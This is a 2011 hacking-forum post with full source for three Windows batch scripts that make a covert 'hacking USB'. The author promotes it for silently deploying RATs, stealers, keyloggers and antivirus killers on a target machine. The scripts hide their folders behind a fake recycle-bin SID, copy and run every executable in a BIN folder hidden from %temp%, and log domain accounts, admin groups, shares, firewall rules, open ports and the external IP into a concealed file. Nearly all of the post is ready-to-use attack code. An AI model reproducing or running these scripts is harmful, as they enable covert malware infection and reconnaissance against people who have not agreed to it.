Making a Ultimate Hacking USB with Only .BAT files. - 19 August 2011

Main » » Making a Ultimate Hacking USB with Only .BAT files.

9:39 AM Making a Ultimate Hacking USB with Only .BAT files.
I have seen many different attempts at creating a USB hacking tool. The switchblade and hacksaw were okay, but they would set off many alarms deeming it useless, so I propose something different. This uses (3) simple batch files, Go.bat, injector.bat, and sysinfo.bat. Save all three of these files to the root of any usb. Then run go.bat, it will create a hidden directory on your usb drive called Recycler. Note: after first run the folders, and go.bat will be hidden system files, and injector, and sysinfo will move into another folder, they will no longer be in the root. In this folder there are three sub folders, System (scripts will install here), Docs (logs go here) and BIN (Put any executable here, .exe, .bat, or .vbs, and it will copy it the target computer and execute it) The concept here is there are no better tools for USB hacking than Rats, Stealers, Keyloggers, Downloaders, AV Killers, etc, that can be found on this site and made fud with the available crypters here. The reason for the copy and execute is because if you use an encryption algorithym like Blowfish for example, the execution time can be minutes or at least a long time. Longer than you probably want to stick around. I have copied and executed 15 files at once, like I-stealer, Cybergate, etc, and it takes about 10-15 seconds. While this is occurring a second script is using windows tools to gather some quick intel like external ip, history, network statistics, ports utilized, etc. I run this on a machine with KIS 2011 on it and no alarms occur, if your files are fud. So here goes, thanks to Pithbot and Forum_Reader for their assistance. Save all three files to root of usb and run go.bat. When complete your usb eject menu will come up, after that add some files to the BIN folder and see this will do. ::__Go.bat__:: Code: @(echo off & break off & Title _) >nul If %~d0 == %systemdrive% goto :EOF ::First Run Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\System" If exist %wrkdir% CD %wrkdir% >nul & Goto Next If not exist %wrkdir% mkdir %wrkdir% >nul Attrib +s +h Recycler /d /s :Next if exist injector.bat copy /y injector.bat %wrkdir% >nul && del /f /q %~d0\injector.bat >nul if exist sysinfo.bat copy /y sysinfo.bat %wrkdir% >nul && del /f /q %~d0\sysinfo.bat >nul if exist inject.vbs del /f /q %~d0\inject.vbs >nul if exist sysinfo.vbs del /f /q %~d0\sysinfo.vbs >nul CD %wrkdir%>nul If exist inject.vbs Start "" inject.vbs>nul & Goto Next1 If exist injector.bat Start "" injector.bat >nul :Next1 If exist sysinfo.vbs Start "" sysinfo.vbs >nul & Goto Next2 Call sysinfo.bat :Next2 attrib +s +h %0 cls exit ::__Injector.bat__:: Code: @(echo off & break off & Title _) >nul ::-------------------------------------- ::This is called the Injector :: This script is meant to only run from flash drive :: On first run, it makes the %wrkdir% on your flashdrive as a place to hide files :: I used recycler\S-15~ ect to make it look not obvious as a hidden system folder :: Any executable files place in the "Bin" folder will be copied to %temp% and executed, exe, bat, and vbs :: It have put 10-15 files in there at once and it copies and executes them all in about 10 seconds ::Very handy if you have things that inject into memory, that will otherwise cause virtual memory errors if they are executed from USB. ::It's nice because you don't need to know filenames and edit script all of the time it executes everything ::If you make your scripts self destruct that would be good if they only need to run once :: I have another script that logs pc, system and network, open ports, history, info etc, using only windows tools :: It gets called by another script along with this one, and saves to "\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs" ::When this script is complete it brings up the safely remove hardware menu to signify completion for drive ejection. ::----------------------------------------- @echo off & @break off & title _ if not [%1]==[] goto :%1 call %0 system exit :system if exist inject.vbs start "" "inject.vbs" echo set o = createobject("wscript.shell") > inject.vbs echo o.run "%~0 script", vbhide, true >> inject.vbs start "" "inject.vbs" exit :script If %~d0 == %systemdrive% goto :EOF Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\BIN" If exist %wrkdir% CD %wrkdir% >nul & Goto Next If not exist %wrkdir% mkdir %wrkdir% >nul Attrib +s +h Recycler /d /s Goto :EOF :Next ::Non obvious directory creation on PC If not exist "%temp%\MessengerCache" mkdir "%temp%\MessengerCache" >nul :ExeCheck If exist "exe" copy /y ".exe" "%temp%\MessengerCache" & Goto EXEGooD :BatCheck If exist "bat" copy /y "bat" "%temp%\MessengerCache" & Goto BatGood :VbsCheck If exist "vbs" copy /y "vbs" "%temp%\MessengerCache" & Goto VbsGood Goto :eof :EXEGooD For %%j IN ("%temp%\MessengerCache\.Exe") DO Start "" %%j Goto BatCheck :BatGood For %%h IN ("%temp%\MessengerCache\.Bat") DO Start "" %%h Goto VbsCheck :VbsGood For %%i IN ("%temp%\MessengerCache\.Vbs") DO Start "" %%i Del /F /Q inject.vbs >nul @cls & @Exit ::__Sysinfo.bat__:: Code:@echo off & @break off & title _ if not [%1]==[] goto :%1 call %0 system exit :system if exist sysinfo.vbs start "" "sysinfo.vbs" echo set o = createobject("wscript.shell") > sysinfo.vbs echo o.run "%~0 script", vbhide, true >> sysinfo.vbs start "" "sysinfo.vbs" exit :script Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs" If exist %wrkdir% CD %wrkdir% >nul & Goto Next If not exist %wrkdir% mkdir %wrkdir% >nul Attrib +s +h Recycler /d /s && Attrib +s +h Recycler\.txt :Next CD %wrkdir%>nul set logfile=%wrkdir%\%computername%-%random%.txt 2>&1 ::@@System_Info and Log Creation@@:: Echo ********************************** >> %logfile% Echo *******[System Info]******** >> %logfile% Echo ******************************** >> %logfile% Echo. >> %logfile% Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %logfile% time /t >> %logfile% date /t >> %logfile% Echo ******************************************* >> %logfile% Echo *******[External / Internal Ip]******** >> %logfile% Echo ********************************************* >> %logfile% ::This script for external ip was not written by me, got it from spam:: echo Function MyIP_XMLHTTP( )>wan.vbs echo Dim objRequest, strURL >>wan.vbs echo MyIP_XMLHTTP = "0.0.0.0" >>wan.vbs echo strURL = "http://www.whatismyip.com/automation/n09230945.asp" >>wan.vbs echo Set objRequest = CreateObject( "Microsoft.XMLHTTP" ) >>wan.vbs echo objRequest.open "GET", strURL, False >>wan.vbs echo objRequest.send vbNull >>wan.vbs echo If objRequest.status = 200 Then MyIP_XMLHTTP = objRequest.responseText >>wan.vbs echo Set objRequest = Nothing >>wan.vbs echo End Function >>wan.vbs echo ret = MyIP_XMLHTTP( ) >>wan.vbs echo Set FSys = CreateObject("Scripting.FileSystemObject") >>wan.vbs echo Set MonFic = FSys.CreateTextFile("00001.tmp") >>wan.vbs echo With MonFic >>wan.vbs echo .writeLine ret >>wan.vbs echo End With >>wan.vbs call wan.vbs ::--------------------- for /F "tokens=* delims=" %%a in (00001.tmp) do set wanIP=%%a del /F /Q wan.vbs >NUL del /F /Q 00001.tmp >NUL ::--------------------- ipconfig \|find "IPv4" > 00002.tmp for /f "tokens=2 delims=:" %%a in (00002.tmp) do set lanIP=%%a del /F /Q 00002.tmp >NUL ::--------------------- for /F "tokens=* delims=" %%i in ('reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\UILanguages"') do set lang=%%i set lang=%lang:~68,5% ::--------------------- cls echo. >> %logfile% echo ^>^>^> Local IP:%lanIP% >> %logfile% echo ^>^>^> Internet IP: %wanIP% >> %logfile% echo ^>^>^> Localisation: %lang% >> %logfile% Echo. >> %logfile% Echo ********************************** >> %logfile% echo *******[Network Info]******* >> %logfile% Echo ******************************** >> %logfile% Echo. >> %logfile% ::Network Info net user /domain >> %logfile% net group /domain >> %logfile% net localgroup /domain >> %logfile% net localgroup administrators /domain >> %logfile% net localgroup "Account Operators" /domain >> %logfile% net accounts /domain >> %logfile% net view /domain >> %logfile% net view >> %logfile% Echo ******************************** >> %logfile% echo *******[Local Info]********* >> %logfile% Echo ********************************** >> %logfile% Echo. >> %logfile% ::Local Info ipconfig /all >> %logfile% ipconfig /displaydns >> %logfile% netstat -ano >> %logfile% netstat >> %logfile% arp -a >> %logfile% tasklist /svc >> %logfile% tasklist >> %logfile% tasklist /v >> %logfile% net share >> %logfile% net use >> %logfile% net accounts >> %logfile% net localgroup >> %logfile% net localgroup administrators >> %logfile% systeminfo >> %logfile% netsh firewall show config >> %logfile% netsh advfirewall show allprofiles >> %logfile% netsh advfirewall firewall show rule name=all >> %logfile% netsh diag show all /v >> %logfile% netsh diag /v >> %logfile% ping localhost >> %logfile% echo Completed Data Recovery on %time% %date% >> %logfile% ::@@Eject Drive to Signify Completion@@:: setlocal enableextensions rundll32.exe shell32.dll,Control_RunDLL hotplug.dll endlocal :END ::Cleanup ping localhost -n 1>nul Del /F /Q sysinfo.vbs >nul @cls @exit
1 2 3 4 5 Category: Windows Hacking \| Views: 763 \| Added by: 3x3r00t \| Rating: 0.0/0